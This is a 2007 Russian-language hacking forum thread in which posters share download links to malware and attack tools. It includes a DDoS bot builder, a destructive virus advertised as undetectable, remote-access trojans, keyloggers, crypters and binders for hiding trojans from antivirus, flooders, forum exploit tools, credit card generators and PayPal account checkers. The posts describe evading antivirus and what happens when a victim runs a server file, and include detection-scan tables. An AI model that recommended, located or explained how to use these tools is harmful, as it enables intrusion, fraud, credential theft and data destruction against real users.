Illusion Ddos bot 1.1

В архиве: хелп, ридми, крякнутый билдер, некрякнутый билдер (во вложеном архиве), пустой сервер бота.

Автор: Gener 28.05.2007, 19:13

Немного софта от KD-Team

- Java Bind Shell

A example that shells are also possible with java.

Автор: Creeping Death 29.05.2007, 13:58

Yahoo Fake
http://rs108.rapidshare.com/files/33901066/fakeyahoo.rar

SHA-1 Cracker
http://rapidshare.com/files/33552570/SHA-1_Cracker.rar

Hippi virus
Virii.exe Summary :
-Modifies registry so that the user can't run
any exe, bat, ini, inf, reg files anymore ..
-Disables ALL exe's on computer including regedit, cmd, ...
-Deletes restore settings
-Modifies files of LastKnownGood Configuration changes
SystemFolder & Windows folder so it will be much worse to
start with LastKnownGood configurations to repair virii
-Modifies usb mass storage drivers and usb driver to make sure
that the user can't backup his data, disables access to new
usb drivers
-Windows can't be reinstalled because it gives error
"rundll32.exe" can't be opened. HDD should be formatted first
to install windows.
-3KB, completely undetectable ...
Tested in WinXP Sp1 & Sp2
NE TESTAT
http://rapidshare.com/files/33923095/virii.exe.html

Автор: Creeping Death 29.05.2007, 17:48

RapidShare Pack
* Bypass 1 hour limit
* Cred!t C@rd Generator2007
* RS Grabber 1.4.8
* No 1 proxy
* Rapidown 5.9
* RS Money
* Rapidsharecom Hack
* RsGetPoints 233
* USDownloader 21.4
* Rapidshare Premium Account
Bonus:
* Megaupload Hack
* Megaupload Premium
* Lifetime Premium
* More....
http://rapidshare.com/files/34025578/RapidShare_Pack_2007_may.rar

Автор: Creeping Death 31.05.2007, 20:52

Google Hacker 1.2
Небольшая софтинка упростит нашу задачу. теперь не придется в n-ый раз за вечер, общаться с гуглем. она все сделает на вас=)
http://rapidshare.com/files/34419081/Google_Hacker_1.2.rar.html

SuperScan
is a powerful TCP port scanner, pinger and hostname resolver.
/*впринципе, ничего особенного*/
http://rapidshare.com/files/34425920/superscan.rar.html

yahooUltraCracker
Powered By ArvinHacker =))
http://rapidshare.com/files/34425613/yahooUltraCracker.rar.html

Craven's Spam a Forum
довольно-таки шустрый и удобный
http://rapidshare.com/files/34425480/UC.Forum_Spam.rar.html

Pure phpBB emali Extractor
http://rapidshare.com/files/34425252/phpBB-Hack-Pack-ver1_1_.0.rar.html

phpBBcracker
http://rapidshare.com/files/34425117/phpBBcracker.rar.html

phpbb attack
2.x
http://rapidshare.com/files/34424959/phpbb_attack.rar.html

Php Nuke Hacker v11.0
учим турецкий. проста до безобразия.
http://rapidshare.com/files/34424795/Php_Nuke_Hacker_v11.0.rar.html


DoS 5.0
http://rapidshare.com/files/34420631/DoS_5.0.rar.html

Astaroth
http://rapidshare.com/files/34420176/Astaroth.rar.html

E-mail_Cracker
http://rapidshare.com/files/34418977/E-mail_Cracker.rar.html


MSN Messenger Account Cracker v2.0
http://rapidshare.com/files/34418007/MSN_Messenger_Account_Cracker_v2.0.rar.html

Slh 3.0 RAT
Thx to santasdad
http://rapidshare.com/files/34407835/s3.rar

cgi scanner
http://rapidshare.com/files/34418669/cgis4.rar.html

Автор: Creeping Death 11.06.2007, 09:17

CryptX 1.0 Public

Date: 4/20/2007
Platforms: All Windows Platforms
Undetectable as of 4/20/2007.
-RAR Password-
cryptX
NOTE: For each crypted file, the crypted file will copy itself
to the index directory (Where you launched CryptX from, and will save it
as crypted.exe) You'll need to put that file into a new file location.
NOTE: When CryptX is unloaded, it'll cause an invalid window call, just
click Cancel or No, on debug, and everything is saucy.
::Disclaimer::
In no way am I responsible for any unethical/illegal useages of CryptX! Please use this CryptX was made for educational purposes only. Please use this at your own risk.
::How it works?::
CryptX adds false code by Denoted bits of data to the PE Header and Entry point, thus confusing anti-virus hueristics. on randmomized 33555.59 Data variation. (the more you crypt the binary, the more different the outcome will be)
Some notes: After you've crypted the binary you may find it useful to pack it with a PE Packer. I recommend MEW 11, as being the most reliable and effective for packing distributable binaries. Please use this at your own risk, as I am not responsible for any damage or data loss using CryptX.
Enjoy CryptX!
Undetectable Status
FUNCTIONALITY AND STABLIZATION AFTER
CRYPTED MAY VARY, AND DEPENDING ON EACH VARIANT MAYBE
DIFFERENT FROM ANOTHER. I CRYPTED ONE OF EACH OF THE FOLLOWING
TROJANS, THEREFOR I AM JUST MAKING A "LOGICAL" GUESS THAT IT WILL
MAKE THE OTHER VARIATIONS THE SAME.]
MoSucker - all variations.
SubSeven - all variations.
C.I.A - all variations.
Net Devil - all variations.
Optix Pro - all variations.
DoS 5.5 - all variations.
Assorted Virii, worms, et cetera
effectivelly made undetected by
CryptX 1.0
If you crypt MyDoom, or some other serious shit,
don't be dumb, and re-populate it. Thanks.

http://rapidshare.com/files/36417385/CryptX_1.0.rar

MicroJoiner v1.7

http://rapidshare.com/files/36418044/mj17.zip

Chimera
автор: Kuzya
При запуске chimera прописывает себя в реестре и открывает на 10000 порту фтп сервер.
Небольшая особенность здесь в том, что бродя по папкам заражённого компа
Вы всегда будете видеть дополнительные папки с именами имеющихся дисков - то есть
из любой директории любого диска Вы можете попасть в корень другого диска.
Трой написан на делфи 6. Весит 176кб. На момент публикации антивирусами не палится.
Единственная известная пока бага: если заражённый имеет несколько IP-адресов то
к фтп серверу можно подключится только через один IP из этих нескольких.

 Chimera.zip ( 164,32 килобайт ) : 199

Автор: Creeping Death 11.06.2007, 11:51

http://www60.megaupload.com/files/1deb8067d68605a465dfa87b0bbef862/ExploitSQL.rar

Автор: Creeping Death 12.06.2007, 00:21

DHC-Hacking-Toolz
1. Ddoz Toolz
2. SQL Injection
3. CC [ Credit Card ]
4. IRC Attacking
5. Google Hacker
6. RapidShare Hack


http://rapidshare.com/files/36519048/DHC-Hacking-Toolz__AIO_.rar


SubSeven 2.1 gold edition
http://rapidshare.com/files/36507346/s21gold.zip.html


prorat v2.0
http://rapidshare.com/files/36530704/ProRatv2.0.rar.html

Wireless Hack Toolz
Kismet-2005-08-R
NetStumbler-0.4.0
Wellenreiter-v1.9
WEPcrack 0.1.0
airsnort-0.2.7e
wepwedgie-0.1.0-alpha
Hotspotter-0.4
Advanced Bash-Scripting Guide
Bash Guide for Beginners
The Linux Network Administrator's Guide, Second Edition
http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar

Автор: Creeping Death 12.06.2007, 12:53

nBinder 5.1

http://rapidshare.com/files/36648901/nbinder_setup.rar

Advanced Invisible Keylogger v1.8 + Crack

http://rapidshare.com/files/36650292/Advanced_Invisible_Keylogger_v1.8.rar

Автор: Creeping Death 13.06.2007, 13:27

PHP Injection Scanner

http://rs124.rapidshare.com/files/36771817/Php_Injection_Scanner-mr.jack.rar

Автор: Creeping Death 13.06.2007, 19:16

Undetector v.1.2

http://rapidshare.com/files/36984051/Undetector_1.2.rar

Автор: Creeping Death 13.06.2007, 20:05

ProxyFuzz

ProxyFuzz is a man-in-the-middle non-deterministic network fuzzer written in Python. ProxyFuzz randomly changes (fuzzes) contents on the network traffic. It supports TCP and UDP protocols and can also be configured to fuzz only one side of the communication. ProxyFuzz is protocol agnostic so it can randomly fuzz any network communication.

ProxyFuzz is a good tool for quickly testing network protocols and provide with basic proof of concepts. Using this tool you will be amazed by the poor quality of software and you will see clients and servers dying upon unexpected input, just be prepared to see the very weird behaviours.

Syntax of ProxyFuzz:


ProxyFuzz 0.1, Simple fuzzing proxy by Rodrigo Marcos

usage():

python proxyfuzz -l <localport> -r <remotehost> -p <remoteport> [options]

[options]

-w: Number of requests to send before start fuzzing

-c: Fuzz only client side (both otherwise)

-s: Fuzz only server side (both otherwise)

-u: UDP protocol (otherwise TCP is used)

-v: Verbose (outputs network traffic)

-h: Help page
http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.py
http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.zip

Wfuzz - The web bruteforcer

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.

It's very flexible, here are some functionalities:

* -Recursion (When doing directory bruteforce)
* -Post data bruteforcing
* -Output to HTML (easy for just clicking the links and checking the page, even with postdata!!)
* -Colored output on all systems
* -Hide results by return code, word numbers, line numbers, etc.
* -Url encoding
* -Cookies
* -Multithreading
* -Proxy support
* -All parameters bruteforcing (POST and GET)
* -Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i,
Vignette, Coldfusion and many more. (All dictionaries are from Darkraver's Dirb, www.open-labs.org)

http://www.edge-security.com/soft/wfuzz-11.zip
http://www.edge-security.com/soft/wfuzz-1.1.tar.gz

Автор: Creeping Death 13.06.2007, 20:10

AWexploder 1.3

AWexploder helps you to find virtual hosts for a given IP address and looks for a CMS in each virtual host. In this version it looks for OpenSourceCMS's. More cms's will be added in later verions.

http://www.edge-security.com/soft/AWexploder.tar

Автор: Creeping Death 16.06.2007, 10:16

Hackers Fantastic KIT

CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer's NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online - Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
Cool Advanced Anonymous E-mailer April 2005
Simple Anonymous E-mailer
Anonymous E-mailer with Attachment Support
Mass E-mailer
E-mail Bomber
E-mail Spoofer
Simple Port Scanner (fast)
Advanced Netstat Monitoring
X Pinger
Web Page Scanner
Cool Fast Port Scanner
Deep Port Scanner
Fastest Host Scanner (UDP)
Get Header
Open Port Scanner
Multi Port Scanner
HTTP scanner (Open port 80 subnet scanner)
Multi Ping for Cisco Routers
TCP Packet Sniffer
UDP flooder
Cool Resolve and Ping
Multi IP ping
File Dependency Sniffer
EXE-joiner
Encrypter
Advanced Encryption
File Difference Engine
File Comparasion
Mass File Renamer
Add Bytes to EXE
5Cool Cool Variable Encryption
59) Simple File Encryption
60) ASCII to Binary
Enigma
Password Unmasker
Credit Card Number Validate and generate
Create Local HTTP Server
eXtreme UDP Flooder
Web Server Scanner
Force Reboot
Cool Webpage Info Seeker
Bouncer
Advanced Packet Sniffer
IRC server creater
Connection Tester
Fake Mail Sender
Bandwidth Monitor
Remote Desktop Protocol Scanner
MX Query
Messenger Packet Sniffer
Cool API Spy
DHCP Restart
File Merger
E-mail Extractor (crawler / harvester bot)
Open FTP Scanner
Fast Patch
Predator's Extreme Loader Generator 0.3
Srlzer - Patch generator
Yoda's Process Patcher
Buddha Patch File Creator 2.2
CodeFusion
Cool Beans NFO Creator 2.0.1 build 3
Patch Creation Wizard v1.2
Patch On The Fly v0.75
Rlzer
RTD - WINpatch v1.0
Tola's Patching Engine


Analysis :
OllyDbg 1.10
W32Dasm 8.93 /w patch
PEiD 0.92

Rebuilding :
ImpRec 1.6
Revirgin 1.3
LordPE RoyalITS

Packers :
FSG 2.0
MEW 11 1.2 SE
UPX 1.25

Patchers :
dUP 1.11
CodeFusion 3.0
Universal Patcher Pro 2.0
aPatch 1.07 (*New)
PMaker 1.1.0.0 (*New)
Tola's Patch Engine 2.03b (*Nuevo)
ABEL Loader 2.31 (*Nuevo)


HEX Editor :
BView 5.6.2

Decompilers :
DeDe 3.50.04
Flasm

Unpackers :
Alot! ( ASProtect, ACProtect etc )

Others :

FileMon
RegMon
RSATool 2
d*mn HashCalc
Krugers ToolBox
EVACleaner 2.7 (*New)
Process Explorer (*New)
Resource Hacker (*New)
PUPE 2002 (*New)

http://forum.hack-elite.com/board/tools/part1.zip
http://forum.hack-elite.com/board/tools/part2.zip

Автор: Creeping Death 16.06.2007, 10:39

Naked Packer 1.0

http://rapidshare.com/files/37434760/nakedpack.rar

Автор: Creeping Death 16.06.2007, 14:37

UnDo Crypter

UnDo Crypter Public Version
* Currently Undetectable from all AntiVirus
* Stub size is 4.50kb packed with UPX
* has a small compression ratio for unpacked files
bifrost server example 28.3kb / 32.8kb crypted

source code and private versions are for sale (contact i.am.noble.com@gmail.com for details)

http://rapidshare.com/files/37486192/UnDo_Crypter.rar

SharK 2.1.2&2.1.3

sharK is an advanced remote administration tool written in VB6. With sharK you will be able to administrate every PC in the world (using Windows OS) remotely. Here are some facts:

* sharK uses RC4 to encrypt the traffic
* sharK is able to resume downloads and uploads when the server disconnects on the next connect
* Compressed Transfers
* Thumbnail Previews of Pictures
* Keylogger works with Keyboard hooking
* You have a real DOS-Shell instead of dos-output like in the most rats
* Interactive Process Blacklist
* Virtual-Machine detection
* Double-Compression in Screencap & Webcam-Capture

And much much more. SharK is designed for professional remote administration, so you don’t have colourfull buttons etc and can enjoy lot’s of rightclick-menus and hotkeys and stuff like histograms.
- - - - - - - - - - - - - - - - - - - - - - - -
in 2.1.3
+ = New Feature
* = Bugfix

[+] You can show additional informations like AV/FW/Webcam/Browser in the SIN Console
[+] Raring Folders possible
[+] Broadcast-Download Possible
[*] Client didn't show interval correctly when loading settings
[*] Client doesn't show up the versionnumber twice in systray
[+] Menuitems can be collapsed automaticially
[*] Put zlib.dll inside the archive so screencap works for all Razz
[*] Group-Functions had big bug



http://rapidshare.com/files/37492616/sharK_212.rar
http://rapidshare.com/files/38078471/sharK_2.1.3.rar

Автор: Creeping Death 18.06.2007, 10:56

Pack Hack


-MailerX = You can spam with email! (it contains an smtp server)
-PHP Attacker = is a program that allow you to run exploitz on a website.(php)
-PhpNuke = Is a program that allows you to make sql injection on phpnuke sites (IT WORKS IS AWESOME)
-PHP-Nuke_Hacker = is a program that allow you to run exploitz on any website finding exploits from www.milw0rm.com
-IFRAME_DDoS_v1[1].0= You can flood a website with multiple connections
-Reuploaded=is a webnuker for websites! (it works great)
-ICMP DoS=You can flood a website
-IP_Hider_v2[1].7_-xray-=Is a good one for hiding you ip..(i am using it)
-PP-checker=Paypal checker to hack paypal accounts
-BrutusAET2 Host by HybriD3_2= one of best bruteforces ever
-evilsmiley= an .exe file that an evil face with an evil smiley appears on your monitor and u cant do anything ( a funny one )
-CSF-(c-sploiter final)= i will let you to check this out alone
-AntiDote_v1[1].2_osCE=To make a trojan undetected!
-Nudge_Madness=basicly is an autoclicker
-msn-nudger=it spams your contacts with nudges
-YouTUBE_downloader_2.1.1=you can download the videos on youtube with this program
-MEssBlackFrezzerBeta=You can freeze someone's account on msn
-bugs.txt= a text file that contains different bugs like a site could have...
-sploof_v0.90.installer= a program to try a website's security....
-proxylist.txt = contains proxies
-proxies.txt= contains proxies
-ipsteales = is a shell that helps you to steal someone's ip

- - - - - -
ИМХО,3-, но может кому-нибудь пригодится;)


http://rapidshare.com/files/37798225/pack.rar

Автор: Creeping Death 18.06.2007, 16:09

Aw&Firewall Killer v1.0 Release


http://rs11.rapidshare.com/files/20314776/S.E.T_Aw-Firewall_Killer_v1.0.rar

Автор: Creeping Death 19.06.2007, 12:26

Mirkov4 v1.1

Mirkov4, a remote administration tool over http. It currently features desktop interaction (ala VNC), naviguation through the computer drives, download/upload/removal of files, execution of commands and a display of current running processes.

проверено под Win2003 with NOD32.
коннект- через брауз http://ip_vitima:7887


http://www.hacker-soft.net/down.php?id=2437&url=1

DalKrypt 1.0
http://rapidshare.com/files/38077832/DalKrypt_1.0.rar

Slh 4.0

+new file transfer manager pause/resume your transfers hopefully more stable
~server updates new identication imediatly
~changed compression engine (smaller server)
-removed registry editor and plugins will add again soon (improving)
~server 90% re-write
+most data compressed between client and server compressed
+HKLM and HKCU startup methods re-added
+ability to change mutex name
+added option to direct connect - still very usefull
~improved transfers stabilty
~persistance option improved
~socket connections improved
~changed stupid two letter varibales
main window
~show extension version outdated extension version showed in red.
+added dockable windows for connections,transfers + windows
system information
+added %IDLETIME% varibale get time away from keyboard + mouse
file manager
+drag drop files to upload
+goto folder with links for most folders
screen cap
+speed improved Ura
+change image bitcount when using bitmap
webcam
+option to select webcam driver
keylogger
+online key logger
other lil things
+added option to auto upload extension
~bold group names optional
+added skin support - not yet implemented

http://rapidshare.com/files/38079500/Slh_4.0.rar

Автор: Creeping Death 21.06.2007, 20:38

The Punisher Trojan

Antivirus Version Update Result
AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.19.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.19.2007 no virus found
BitDefender 7.2 06.20.2007 Generic.Malware.SDbTk.997E24F1
CAT-QuickHeal 9.00 06.19.2007 no virus found
ClamAV devel-20070416 06.20.2007 no virus found
DrWeb 4.33 06.20.2007 WIN.SCRIPT.Virus
eSafe 7.0.15.0 06.19.2007 no virus found
eTrust-Vet 30.7.3727 06.19.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.20.2007 no virus found
Fortinet 2.91.0.0 06.20.2007 no virus found
F-Prot 4.3.2.48 06.19.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 Backdoor.Win32.VB.gen
Ikarus T3.1.1.8 06.20.2007 no virus found
Kaspersky 4.0.2.24 06.20.2007 Backdoor.Win32.VB.gen
McAfee 5056 06.19.2007 VB-BackDoor.a.gen
Microsoft 1.2607 06.20.2007 no virus found
NOD32v2 2341 06.20.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 no virus found
Prevx1 V2 06.20.2007 no virus found
Sophos 4.18.0 06.12.2007 Mal/VB-F
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.20.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.19.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found

When the victim open server.exe this will close automatically windows firewall ,nod32 ,sygate firewall ,disable task manager

Server copy: C:\WINDOWS\system32\Svchost32.exe
Trojan Name: The Punisher Trojan
Server size:294 KB
Client Size:1,45 MB
Coded In : Visual Basic
Author:E.M.I.N.E.M

http://rapidshare.com/files/38467233/The_Punisher_Trojan.rar.html
http://www.g0t-filez.net/472263

Автор: Creeping Death 22.06.2007, 16:20

Some Hack Tools(pack)

-DoS Attacker

-Ftpbrut

-FTPBruter

-Ip Scaner

-Ip Nuker

-Xp killer

-EliteKeylogger v1.0

-LogIT v1.0

-LttLogger v2.0

-SCKeyLog v 2.24

-Bitfrost v 1.102

-ColdFusion v1.2

-ProRavt v1.9

-ToquitoBandito v 5h17

-ToxiBackDoor

-BlackCobra Downloader

-ToxiWebdl v1.1

http://rapidshare.com/files/38667356/Hack_tools.rar

Автор: Creeping Death 23.06.2007, 12:06

[AIO] PassWord Sniffer

MessenPass
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.


Mail PassView
Recovers the passwords of the following email programs: Outlook Express, Mcft Outlook 2000 (POP3 and SMTP Accounts only), Mcft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


Protected Storage PassView
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more...


Dialupass
Password recovery tool that reveals all passwords stored in dial-up entries. (Internet and VPN connections) As opposed to many other tools, this tool works in all versions of Windows, including Windows 2000 and Windows XP.


Asterisk Logger
Recovers passwords stored behind asterisks (****) characters. You can use this tool to recover the passwords of many applications, like CuteFTP, CoffeeCup Free FTP, VNC, and more...


Network Password Recovery
Recover network passwords stored by Windows XP operating system.


SniffPass Password Sniffer
Capture the passwords that pass through your network adapter, and display them on the screen instantly.
You can use this utility to recover lost Web/FTP/Email passwords.

http://rapidshare.com/files/38772211/PWSniff.rar

Автор: Creeping Death 23.06.2007, 15:58

SBinder

http://rapidshare.com/files/38847479/SBinder.zip

Vulnerability Scanners Pack

+CGI Founder
+Cgi Scanner 4
+LanSpy
+Libwhisker 2.3
+Nikto
+NStealth HTTP Security Scanner 5.8 Free
+Retina - For Windows NT
+Shadow Security Scanner 7.84
+THC-Amap Version 5.2
+VoidEYE CGI Scanner
+Web Check


http://rapidshare.com/files/38849020/Vulnerabilty_Scanners.rar

Password Decrypters Pack

-Access Driver
-Brutus-AEt2
-Cain and Abel 4.2
-FileZilla PWDump 0.1
-ForceSQL
-John The Ripper 1.7.1 Win
-KMd5 1.03b
-LC3
-MailForce2.4
-MD5 (Linux)
-MD5 Backup (Linux)
-MD5 GUI
-MD5 Toolbox 1.0
-MD5brute 1.0
-Passware 5.0 + Serial
-POP3 BruteForcer
-Sam Decrypt
-Unsecurev1.2
-VNCrack (Linux) 1.21
-VNCrack (Win32) 1.21

http://rapidshare.com/files/38850477/Password_Decrypters.rar

Packers, Crypters and Protectors Pack

-AREA 51 Cryptor
-ASPack 2.12
-AZProtect
-Cexe (NT Only)
-Diet
-Enigma Protector 1.16
-exe32pack
-ExE Evil v1.0
-EXESmasher 1.0
-FSG v1.33.zip
-FSG v2.0
-ICrypt 1.0
-IProtect
-Krypton v0.3
-Lzexe1.00a
-Mew 11 SE v1.2
-MoleBox 2.6.1
-Morphine v1.9
-Mr. Undectetable
-NeoLite v2.0
-nPack 1.1.300
-NsPack v3.4 Full Cracked
-NT Packer
-Pack 1.0
-Packman 1.0
-PECompact v2.64 Full
-PEncrypt 4.0
-PEPack 1.0
-Petite 2.2
-Pex 0.99
-Phantom
-PKLite32 1.0
-Private EXE Protector 2.0
-RAT Packer
-RLPack 1.16 Basic Edition
-RLPack 1.17 Personal Edition
-Scramble Tool v0.2.2 rc1
-SDC 1.2
-shrnkEXE
-Stud v1.0 Crypter.
-tElock 0.98
-Underground Crypter 1.0
-UPX v2.02
-UPX Crypt
-Wind Of Crypt 1.0
-WinLite
-WWPACK 3.05
-Yoda's Crypter v1.3

http://rapidshare.com/files/38851879/Packers__Crypters_and_Protectors.rar

Nukers and Flooders Pack

-AdonAi v0.1 FTP DDoS
-AntiRUS 3.0
-Assault
-Battle Pong
-Click 2.2
-Death n Destruction DoS
-Denyo Launch Flooder
-DoS Attacker
-DoSTool
-Ether Flood
-Evil IGMP
-F-ed Up
-Fortune
-FreeSite Killer 2.01
-Hospitables Nuke 2.23
-Http Bomber v1.001b
-Hybrid Flood 2
-ICMP Flood
-IGMP
-Inferno
-IPT
-kod
-Nuke'em
-NuKe.zip
-PacketStorm 1.3
-Panther Mode2
-phpBBAttacker
-phpBB DoS
-Ping Attack
-RCP Nuke
-Rocket 1.0
-Site NuKe
-Sprut
-TheRapist
-UC Forum Spam
-Vai Tu J Nuker
-Voob
-VZM Nuker
-Web Attacker ENG
-Web X Grabber

http://rapidshare.com/files/38854169/Nukers_and_Flooders.rar

Binders Pack

-AFX Executable Binder PRO
-Amok Joiner
-Asylum Binder
-Binder
-BlackCore File Binder
-Blade Stoner 1.5
-BTS Binder
-Crucified 1.2
-Djoiner 1.3
-Deception v4.0
-Droopy Binder 1.0
-EES Binder 1.0
-exe,jpg,doc File Binder
-Exebinder v2.5
-F.B.I
-File Injector v3
-Fresh Bind
-Freshbind v2.01
-Frusion v1.0
-HelioS Binder v1.0c
-Hook Toolbox
-IDE Spinner
-Inbinder v1.0
-Interlaced II v1.00
-J-BiNdEr
-M3Byter
-MBinder
-Multi Binder 1.4.1
-MVM v1.0
-NakedBind v1.0
-Newjoin
-NG Binder Pro
-Nightwolf Binder 1.0 Alpha
-OverDoz 2
-Pretator v1.6
-Reductor 1.0b (Beta 4)
-Rephlex Binder 0.2
-SCD 1.0
-Silk Rope v2.0 (Binaries and Source)
-ToP GUI Full 2.0
-Trendy Nigger 1.0b
-X-Exe Joiner
-YAB (Yet Another Binder)

http://rapidshare.com/files/38856990/Binders.rar

Keyloggers Pack

-Activity Keylogger v1.0
-Advanced Invisible Keylogger 1.5 Full
-Aplus
-Barok 1.0
-Chota
-Computer Spy
-Curiosity
-CYBERSHOK 1.0 Private
-DK2Full
-ehks 2.2
-Elite Keylogger 1.0
-EyeSpy
-Fearless Key Spy 2.0
-FSK 2.0
-KeyLog 2.5
-Keylogger
-KGB KeySpy 2.0 Private Xmas Edition
-Metakodix Stealth Keylogger 1.1.0 Cracked
-MSGate 0.1
-Phantom 2
-Phoenix
-Power Spy 5.5.2
-Project Satan 1.1
-RemoteLogger v1.0
-SC-KeyLog 2
-SKL 0.1
-skl0g
-Spy
-Spytector 1.3.1
-Tong KeyLogger
-YSK KeyLog

http://rapidshare.com/files/38855413/Keyloggers.rar

Автор: Creeping Death 23.06.2007, 20:23

Surrogafier 1.0-rc3

Surrogafier is an easy to install three tier web proxy written in PHP. It is free to use and distribute under the GNU General Public License (GPL). A demo install of Surrogafier can be found here.

Features include the ability to remove cookies, the HTTP referer field, the HTTP user-agent field, scripts on the page, and objects, altering the user-agent string to whatever you please, and tunnelling your proxied traffic through a second proxy.

If there existed a freely public install of this script, two standard proxies could be used, one entered in the proxy settings of your browser, and one entered into the publicly installed web proxy, to create a connection being passed between three separate proxy servers before hitting the final destination.

Most web sites should be supported by this web proxy. AJAX applications might have problems with Surrogafier, but I would still like to know if an AJAX application is not working.
.

http://bcable.net/archive.php?surrogafier-1.0-rc3.php

Автор: Creeping Death 26.06.2007, 21:05

PS Crypter
http://rapidshare.com/files/39474720/PS_Crypter.rar

Scofield Cryptor 1.1 [Private]
http://rapidshare.com/files/39475372/Scofield_1.1.rar

Poison Ivy 2.3.0 [unpacked]
http://rapidshare.com/files/39476676/Poison_Ivy_2.3.0__unpacked_.rar

Автор: Creeping Death 27.06.2007, 15:24

Undetector By YaMaNe
http://rapidshare.com/files/39602002/UndetectorByYaMaNe.zip

Slh 4.0.1
http://rapidshare.com/files/39602334/Slh_4.0.1.rar

PHPBB RFI Scanner [Privat]
http://rapidshare.com/files/39533407/PHPBB_RFI_Scanner.rar

Автор: Creeping Death 28.06.2007, 00:39

Z-Dem0n 1.26

http://rapidshare.com/files/39716270/zdemon.zip

J Multi Binder 1.0
http://rapidshare.com/files/39715279/J_Multi_Binder_1.0.rar

Автор: Creeping Death 28.06.2007, 15:40

AntiDote v1.4

http://rapidshare.com/files/39832112/AntiDote_v1.4.rar

The Art Of Deception - Binder [New Stub]

http://rapidshare.com/files/39822101/The_Art_Of_Deception__New_Stub_.rar

Super Binder by "PrinceAli"

http://rapidshare.com/files/39819269/Super_Binder.rar

SkD Undetectabler Pro 2.0 - Crypter

http://rapidshare.com/files/39831559/SkD_Undetectabler_Pro_2.0.rar

Автор: Creeping Death 28.06.2007, 15:47

Автор: Creeping Death 28.06.2007, 16:08

Vulnerabilityes Scanners & Exploiters Pack v1.10

+Absinthe 1.3.1 Windows
+AnonFTP Anonymous Scanner
+Apache Scanner
+CGI Scanner
+DarkScanner 2.0
+FTP-IIS Fx Scanner
+HScan 1.20
+HTTP Server Detector
+ISS Internet Scanner v6.2.1
+JAAScoisX-Code RFI Code Exec Scanner
+N-Stealth Security Scanner v3.7 Built 67
+RFI T00l
+WebCheck
+Win32 x86 RFI Vuln Scanner
+X-Scan 3.3
+XSS LFI and File Discolure Scanner
+Zehir Exploit Scanner
+NetCat
+NMap 4.20

::Port Scanner::

+SuperScan 3.00
+SuperScan 4

::Other Tools::

+QuickSpoof
+PuTTy 0.60

http://rapidshare.com/files/39672244/Vulnscan.rar
Thx to iNs @ + D4RK-R3V-T34M +

Автор: Creeping Death 29.06.2007, 15:23

Themida v1.8.5.5

http://rapidshare.com/files/40014079/Themida_v1.8.5.5.rar

Yahoo!Messenger Monitor Sniffer v3.0

http://rapidshare.com/files/33957234/YahooMonitor.v3.0.rar

Ace Password Sniffer v1.3

The most powerful and effetive password sniffer. Ace Password Sniffer can listen on your LAN and enable network administrators or parents to capture passwords of any network user. Currently Ace Password Sniffer can monitor and capture passwords through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password.

http://rapidshare.com/files/21376566/Ace_Password_Sniffer_V1.3.rar

SNMP Bruteforce

Автор: StuDY 24.07.2007, 15:06

Автор: bdrFsg 24.07.2007, 21:08

Blue's Port Scanner



http://www.bluebitter.de/download/BluesPortScan.zip
Gui-Version v5.0.2 Build #1265

http://www.bluebitter.de/download/CBPS.exeCommand line-Version v4.2 #272
Windows9x/ME/NT/2000/XP

A good port scanner is just one of the basic tools anyone who is
seriously interested in the internet needs.
The BluesPortScan is, i think, the fastest scanner for 32Bit windows which you can found in the net. It scans local 5000 ports in 8sec. on my 2k (P3-866) machine. If you are using Win9x/ME it's a little bit slower... The new version 5 has now features like Port list-scans, AutoCompletion when entering known, existing host names or ips and a big big list of typical port assignments. And of course, it's a little bit more stable, especially under Win9x/Me although these OSs are definitively not the operating systems of choice for the using this program.

Хороший порт-сканер що є однією з базових утіліт для кожного,хто справді зацікавлений в потребах Інтернету.
